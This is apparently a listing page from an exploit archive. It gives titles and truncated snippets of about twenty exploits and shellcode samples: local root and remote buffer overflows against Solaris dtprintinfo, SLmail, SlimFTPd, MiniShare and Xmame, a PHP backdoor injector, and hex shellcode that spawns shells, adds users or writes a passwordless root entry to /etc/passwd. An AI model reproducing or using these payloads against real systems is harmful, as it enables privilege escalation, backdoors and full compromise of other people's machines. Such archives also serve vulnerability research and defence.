Solaris 789 (SPARC) - dtprintinfo Local Privilege Escalation (2)

Solaris 789 SPARC - dtprintinfo Local Privilege Escalation 2 / raptordtprintnamesparc2.c - dtprintinfo 0day, Solaris/SPARC Copyright c 2004-2019 Marco Ivaldi 0day buffer overflow in the dtprintinfo1 CDE Print Viewer, leading to local root. Many thanks to Dave Aitel for discovering this...

linux/x86 Search (*.php) and Inject PHP_BACKD00R

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //\ Exploit database separated by exploit 0 0 // type local, remote, DoS, etc. 1 1 1 0 + Site : 1337day.com 0 1 + Support e-mail :...

linux/x86 append "/etc/passwd" & exit() 107 bytes

Exploit for linux/x86 platform in category shellcode ================================================= linux/x86 append "/etc/passwd" & exit 107 bytes ================================================= / appendpasswd.c Payload: Adds the string: toor::0:0:t00r:/root:/bin/bash to /etc/passwd thereby...

linux/ppc execve /bin/sh 60 bytes

No description provided by source. / execve-core.c by Charles Stevenson [email protected] / char hellcode = / execve /bin/sh linux/ppc by core / // Sometimes you can comment out the next line if space is needed "\x7c\x3f\x0b\x78" /mr r31,r1/ "\x7c\xa5\x2a\x79" /xor. r5,r5,r5/ "\x42\x40\xff\xf9"...

MOPB-array.txt

?php //////////////////////////////////////////////////////////////////////// // // // | || | | | | | | | || || \ // // | |/ || '|/ |/ -| ' \ / -/ |||| /| || / // // ||||,||| ,|||||||,| || |||||| // // // // Proof of concept code from the Hardened-PHP Project // // C Copyright 2007 Stefan...

Debian 2.2 /usr/bin/pileup Local Root Exploit

No description provided by source. / pileup-xpl.c - local root exploit by core Friday the 13th, July 2001 based almost entirely on code by Cody Tubbs loophole of hhp $ ./pileup-xpl pileup-xpl by core 2001 - beep beep root! usage: ./pileup-xpl offset align0..3 Ret-addr: 0xbfffe09c, offset: 0, alig...

linux/x86 getppid() + execve(/proc/pid/exe) 51 bytes

Exploit for linux/x86 platform in category shellcode ==================================================== linux/x86 getppid + execve/proc/pid/exe 51 bytes ==================================================== / linux/x86 getppid + execve"/proc//exe", "/proc//exe", NULL - 51 bytes - izik / char...

Xmame <= 0.102 (-pb/-lang/-rec) Local Buffer Overflow Exploit

No description provided by source. / xmame-expl.c by sj [email protected] On 20th of Jan it came to my attention that Xmame suffered from several buffer overflow problems. Thinking this issue was resolved, I installed Xmame on my Ubuntu laptop, from the Ubuntu repositories which installed a vulnerable...

netbsd/x86 setreuid(0, 0); execve("/bin//sh", ..., NULL); 29 bytes

Exploit for netbsd/x86 platform in category shellcode ================================================================== netbsd/x86 setreuid0, 0; execve"/bin//sh", ..., NULL; 29 bytes ================================================================== / minervini at neuralnoise dot com c 2005...

sco/x86 execve"/bin/sh", ..., NULL; 43 bytes

sco/x86 execve"/bin/sh", ..., NULL; 43 bytes. Shellcode exploit for scox86 platform / minervini at neuralnoise dot com c 2005 SCOSV scosysv 3.2 5.0.7 i386, execve"/bin/sh", ..., NULL; / include include char scode = "\x31\xc9" // xor %ecx,%ecx "\x89\xe3" // mov %esp,%ebx "\x68\xd0\x8c\x97\xff" //...

Seattle Lab Mail (SLmail) 5.5 - POP3 PASS Remote Buffer Overflow (2)

Seattle Lab Mail SLmail 5.5 - POP3 PASS Remote Buffer Overflow 2 include include include include include include include include include include define retadd "\x9f\x45\x3a\x77" /win2k server sp4 0x773a459f/ define port 110 / revshell العراق القراصنة المجموعة/ char shellcode =...

SlimFTPd 3.15 - Remote Buffer Overflow

SlimFTPd 3.15 - Remote Buffer Overflow / SlimFTPd = 3.15, Remote Buffer Overflow Exploit v0.1. Bind a shellcode to the port 101. Full disclosure and exploit by class101 at DFind.kd-team.com & n3ws at EFnet 10 november 2004 Thanx to HDMoore and Metasploit.com for their kickass ASM work...

MiniShare <= 1.4.1 Remote Buffer Overflow Exploit

No description provided by source. / MiniShare = 1.4.1, Remote Buffer Overflow Exploit v0.1. Bind a shellcode to the port 101. Full disclosure and exploit by class101 at DFind.kd-team.com & n3ws at EFnet 07 november 2004 Thanx to HDMoore and Metasploit.com for their kickass ASM work...

MiniShare 1.4.1 - Remote Buffer Overflow (1)

/ MiniShare ---- EXTRA ---- Update the JMP ESP if you need. A wrong offset will crash minishare. Code tested working on MiniShare 1.4.1 and WinXP SP1 English, Win2k SP4 English, WinNT SP6 English Others MiniShare's versions aren't tested. Tip: If it crashes for you , try to play with Sleep... ---...

Unixware execve /bin/sh 95 bytes

Exploit for unixware platform in category shellcode ================================ Unixware execve /bin/sh 95 bytes ================================ / UnixWare execve of /bin/sh by K2 / char shell = "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"...

linux/x86 xterm -ut -display [IP]:0 132 bytes

No description provided by source. / Linux/x86 execve of /usr/X11R6/bin/xterm -ut -display ip:0, exit 127.0.0.1 is an example, you must change it to a useful ip making a subrutine into the exploit? - you must not delete 'K' after ip:0 - / include stdio.h char shellcode =...

bsdi/x86 - execve /bin/sh 45 bytes

bsdi/x86 execve /bin/sh 45 bytes. Shellcode exploit for bsdix86 platform / BSDi execve of /bin/sh by duke [email protected] / char bsdishell= "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c\x89\x76" "\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff\xff\xff\xff\x07"...

openbsd/x86 add user w00w00 112 bytes

openbsd/x86 add user w00w00 112 bytes. Shellcode exploit for openbsdx86 platform include char shell= "\xeb\x2b\x5e\x31\xc0\x88\x46\x0b" "\x88\x46\x29\x50\xb0\x09\x50\x31" "\xc0\x56\x50\xb0\x05\xcd\x80\x89" "\xc3\x6a\x1d\x8d\x46\x0c\x50\x53" "\x50\x31\xc0\xb0\x04\xcd\x80\x31"...

bsd/x86 - execve /bin/sh setuid 0 29 bytes

bsd/x86 execve /bin/sh setuid 0 29 bytes. Shellcode exploit for bsdx86 platform / BSD version FreeBSD, OpenBSD, NetBSD. [email protected] 29 bytes. -setuid0; -execve/bin/sh; / char shellcode= "\x31\xc0" // xor %eax,%eax "\x50" // push %eax "\xb0\x17" // mov $0x17,%al "\x50" // push %eax...

bsdi/x86 execve /bin/sh 46 bytes

Exploit for bsdi/x86 platform in category shellcode ================================ bsdi/x86 execve /bin/sh 46 bytes ================================ / BSDi execve of /bin/sh by v9 email protected / static char exec= "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c" / 14 characters. /...